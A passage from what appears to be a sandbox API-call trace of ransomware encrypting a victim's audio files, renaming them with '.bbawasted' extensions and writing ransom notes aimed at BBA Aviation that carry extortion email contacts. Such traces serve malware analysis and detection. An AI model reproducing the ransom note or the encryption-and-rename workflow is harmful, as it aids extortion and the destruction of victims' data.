_Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HhPCMYmuOjB3ZJPdNrYLfODK6HH/HBCACiuclV2/R7eMtdP2cpa1RGCotMsVfgf6\r\nfkPK7BenEmYIveDYcVCNoNDushdUstxmOA8R7397yGhLfGZwW7o2pOwhjv6jqfw+\r\nd2m7Fdld1LTPz3+qIzRCn9HdIdhE6uxIrbUWSouN7epHDdOb25iySuBelhzZsXLf\r\n52mLuzrZOrKmjOoxj5ElpPPHUn33MNvsi7smtsnKrAIFOtkB7v9H+DFGLOucf6W0\r\ndDLbwMHiWYXbE5rcqlPS+iKrH2FDEWLI2NTVyyvYpmUfMBGnZwvjXYxICQi4KwKb\r\nQJcSsBJwZXY5RCOD2fdVsd1ZxwAwuZZLjzRuPOIl00sx2j1hfuaL7rBvbqrGWA8f\r\nWZjrtCtuPp3nsrVlCjXrzck1P9TdzbXotVoGgS3D+aUZQHVL68nzMq3g2iYJxebe\r\nbY2fYL29kVJ4G0zLDo8qqcVkXZKkiDwWmStVQ8UIdoV2xTRytK/CxStm2Lwxe5Hd\r\neZuB/v50tDlibOo62HaRwgV6cfogSHH4xQkS85mywwZkwwjDtcjPwpVqoigBEYz2\r\nI+voK/UHhTY/RiLBmeGLXFcZwAsR0rUJHhpvwf5mPkNVcMd8V1/+R6i9rsuirBpj\r\nrZ1gcyI5NpkQoYKfTJ65ldu/S/AhFWeDk4IKC+m5wr+=[end_key]\r\nKEEP IT\r\n") returned 984 [0220.247] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0220.247] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0220.247] SetEndOfFile (hFile=0x280) returned 1 [0220.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0220.250] CloseHandle (hObject=0x280) returned 1 [0220.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0220.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8e00 | out: hHeap=0x660000) returned 1 [0220.251] _aulldvrm () returned 0x0 [0220.251] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a61b8) returned 1 [0220.251] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0220.251] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0220.251] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\g4T0DFW0O9ebkZ_k1.mp3") returned 86 [0220.251] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2b6) returned 0x6b8a28 [0220.252] lstrcpyW (in: lpString1=0x6b8ad4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0220.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0220.252] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6818) returned 1 [0220.252] CryptGenRandom (in: hProv=0x6a6818, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0220.252] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0220.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\g4T0DFW0O9ebkZ_k1.mp3.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\g4t0dfw0o9ebkz_k1.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0220.253] WriteFile (in: hFile=0x280, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0220.255] SetEndOfFile (hFile=0x280) returned 1 [0220.255] SetFilePointer (in: hFile=0x280, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0220.255] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0220.255] lstrcpyW (in: lpString1=0x6b8ad4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0220.255] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\g4T0DFW0O9ebkZ_k1.mp3" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\g4t0dfw0o9ebkz_k1.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\g4T0DFW0O9ebkZ_k1.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\g4t0dfw0o9ebkz_k1.mp3.bbawasted")) returned 1 [0220.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\g4T0DFW0O9ebkZ_k1.mp3.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\g4t0dfw0o9ebkz_k1.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0220.257] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0220.257] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x12ce [0220.257] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12ce) returned 0x5f0000 [0220.257] CloseHandle (hObject=0x27c) returned 1 [0220.258] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0220.258] CloseHandle (hObject=0x290) returned 1 [0220.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0220.258] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a63d8) returned 1 [0220.259] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0220.259] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0220.259] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6708) returned 1 [0220.260] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0220.260] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0220.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0220.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0220.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0220.382] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LK6d2XDxLqUJVI6DkEJs83Odpa99kdCy5ph3/JalgXmd3YBBwFlnbG+iObmehy5G\r\n+uz9xhSGVk97Aj6CKSwbQ8F4ySISdd1I/RosLytOkhajEHVjA2ufJ7X08N8V+b9H\r\ndNSVBdbgOcEeC9bnALMl2xBUUN/2XtrgZdM6Rw40fYhLSuSqFbxXwgbHJdGK8JQQ\r\n3v29zBa/4VpF1UMlyhTrl34cbooFWsTyHP35OOtPwVxOW+zsKOBITRMzZnLFnxK0\r\nZiTvnVsAaW0XYIOuFLkDZqXMc5SgvUjqXP94i7b/hQzXPSOTOOKoSRFJ0l8uHMyx\r\n6uUbLv0iE2guS0NS/mhFK6Fiu+K1vy0mee3GRWW/KcMkfhq1Ug9Yd2rLZDCVj2lt\r\nMSRyCrP6tplxeYPoemhBtK0qaHw83wyNwRlOHTtU3v7LBFdG9lrpmyZk0eelRCfO\r\nFbdoitweQTkCwOi5fEypwStsdd8YQayteDrWwF8yCCYmjkuw2eNn7q62/zAXWi2S\r\nTbtwob0kbEHnIzaRVbF/OzhGbMG4nZh6nGISqR1gSF6F8ukjIZvQQZ+FGaFfJKmD\r\nLPY7Wk9+pKWaUSIiOUwGpRm14iycIpWzvrekyX9tnvl2CLi/2Tp/NcajZE56EcZ1\r\nDVaTjnR3NIWxpolEnl+DRnQVyp2XPWYbLTZ19BuxXrO=[end_key]\r\nKEEP IT\r\n") returned 984 [0220.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0220.382] WriteFile (in: hFile=0x280, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0220.383] SetEndOfFile (hFile=0x280) returned 1 [0220.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0220.385] CloseHandle (hObject=0x280) returned 1 [0220.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0220.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ba150 | out: hHeap=0x660000) returned 1 [0220.386] _aulldvrm () returned 0x0 [0220.386] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a61b8) returned 1 [0220.387] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0220.387] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0220.387] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\77DogDXBbO v9DbyQ.wav") returned 100 [0220.387] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2d2) returned 0x6aecf0 [0220.387] lstrcpyW (in: lpString1=0x6aedb8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0220.387] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0220.387] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6570) returned 1 [0220.388] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6a8fa8 | out: pbBuffer=0x6a8fa8) returned 1 [0220.388] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0220.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\77DogDXBbO v9DbyQ.wav.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\77dogdxbbo v9dbyq.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0220.501] WriteFile (in: hFile=0x28c, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0220.502] SetEndOfFile (hFile=0x28c) returned 1 [0220.503] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0220.503] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0220.503] lstrcpyW (in: lpString1=0x6aedb8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0220.503] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\77DogDXBbO v9DbyQ.wav" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\77dogdxbbo v9dbyq.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\77DogDXBbO v9DbyQ.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\77dogdxbbo v9dbyq.wav.bbawasted")) returned 1 [0220.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\77DogDXBbO v9DbyQ.wav.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\77dogdxbbo v9dbyq.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0220.529] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0220.529] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x111df [0220.529] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x111df) returned 0x5f0000 [0220.529] CloseHandle (hObject=0x280) returned 1 [0220.534] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0220.535] CloseHandle (hObject=0x290) returned 1 [0220.535] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0220.535] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6928) returned 1 [0220.536] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0220.536] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0220.536] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5f98) returned 1 [0220.537] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0220.537] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0220.548] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0220.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0220.549] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0220.549] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Gbf3IEVnQ5wyCArD8o6vIwmTL3MThj3G5aOXNoq2SMwtzpw0LIo8skHT7mO59KJb\r\nI30Y+7ESVUd6WQoEoJMzOmjpTzV4Lr97aVvYQK9c3ByutVEk0sm0QKC8cK+/15wD\r\n+lxjH3FXdbwwNR1m0DHQJa0tzABseC80V53O6YrcE/l+4GGefFBpp2WdkESMFPLe\r\nqOphD1vbMw+1iobGlGJdGvrSiRvFzZTS/vaRmqAyfuViw3j3WpEJBiwXoi4IpRRg\r\nbUUqX7lSDNU2l0gn2ksEHEJGTYElmBEAtOPBdXbh0HNCedK209DltNVCGjhQ7w9q\r\nF46YQgaWqy1TTIq6dhdoYRXdbHMxuyj7jL2O4WYzRuerzUlbiKa8rkhYuJaEMevt\r\nPfau+az2UR/V0YsDJnYYP7wBrjo1OZg/t0g0XhEviH8RiZB335CgYhGLzkbvy+9Z\r\nC8BzKCU/JhayL8Mas08Dk5fm40EsUnQvY+Lc/oZLif2GvJqsACTNq6EsPgaDZdAy\r\nNHpW+PbR5E03W9QyB9kBY+Cg//1JrA1reUKMHZ/q+bBsm5BGZoB9N6SAtIMA/PKu\r\nSkBcs3TRiJpXd3nTpbQRgzvxUs0mMbzUkGej5qJFDNU86SDhfGuSODqoYuO6WeiB\r\nda+3q0588x6pTYu53k4BtHRWVIWeZ7amaIs1OXrVyOL=[end_key]\r\nKEEP IT\r\n") returned 984 [0220.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0220.549] WriteFile (in: hFile=0x28c, lpBuffer=0x6a8fa8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a8fa8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0220.549] SetEndOfFile (hFile=0x28c) returned 1 [0220.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0220.561] CloseHandle (hObject=0x28c) returned 1 [0220.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0220.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x660000) returned 1 [0220.561] _aulldvrm () returned 0x0 [0220.561] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6b48) returned 1 [0220.562] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0220.562] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0220.562] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\64RIaAya.m4a") returned 125 [0220.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x304) returned 0x6aecf0 [0220.562] lstrcpyW (in: lpString1=0x6aedea, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0220.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb470 [0220.562] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6790) returned 1 [0220.563] CryptGenRandom (in: hProv=0x6a6790, dwLen=0xa3a, pbBuffer=0x6bb470 | out: pbBuffer=0x6bb470) returned 1 [0220.563] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0220.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\64RIaAya.m4a.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\64riaaya.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0220.565] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb470*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb470*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0220.566] SetEndOfFile (hFile=0x28c) returned 1 [0220.566] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0220.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb470 | out: hHeap=0x660000) returned 1 [0220.567] lstrcpyW (in: lpString1=0x6aedea, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0220.567] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\64RIaAya.m4a" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\64riaaya.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\64RIaAya.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\64riaaya.m4a.bbawasted")) returned 1 [0220.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Music\\b--GPLwl8W3Zw\\651KeJ-Hp-52cdSBzjZ\\_9hP\\iaKko1x2gDjyh\\hZUI 3EOwB_HwuFK\\K0YcZqc3BoHfYE2Q\\64RIaAya.m4a.bbawasted" (normalized: "c:\\users\\fd1hvy\\music\\b--gplwl8w3zw\\651kej-hp-52cdsbzjz\\_9hp\\iakko1x2gdjyh\\hzui 3eowb_hwufk\\k0yczqc3bohfye2q\\64riaaya.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0220.568] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0220.569] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x12c3e [0220.569] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12c3e) returned 0x5f0000 [0220.569] CloseHandle (hObject=0x294) returned 1 [0220.572] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0220.574] CloseHandle (hObject=0x288) returned 1 [0220.574] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0220.574] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a65f8) returned 1 [0220.574] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0220.574] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0220.575] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6460) returned 1 [0220.575] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0220.575] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0221.056] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0221.056] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0221.056] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 